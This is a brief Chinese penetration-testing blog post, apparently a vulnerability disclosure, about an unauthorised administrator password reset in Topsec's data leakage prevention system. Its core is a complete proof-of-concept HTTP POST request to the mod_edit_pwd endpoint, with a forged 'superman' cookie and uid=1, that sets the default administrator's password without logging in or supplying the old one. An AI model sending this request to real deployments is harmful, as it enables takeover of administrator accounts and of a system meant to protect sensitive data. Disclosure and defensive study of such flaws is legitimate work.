天融信数据防泄漏系统越权修改管理员密码

2020-9-11 / 0 评论 渗透测试 / Mrxn

本文共计 235 字,感谢您的耐心浏览与评论.

EEE26ECA-6A7F-4BA2-A274-713511D57CA5.jpeg


无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。


POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;


uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

标签: 渗透测试 漏洞 未授权

转载:转载请注明原文链接 - 天融信数据防泄漏系统越权修改管理员密码


0条回应:“天融信数据防泄漏系统越权修改管理员密码”


发表评论

{view_code_no}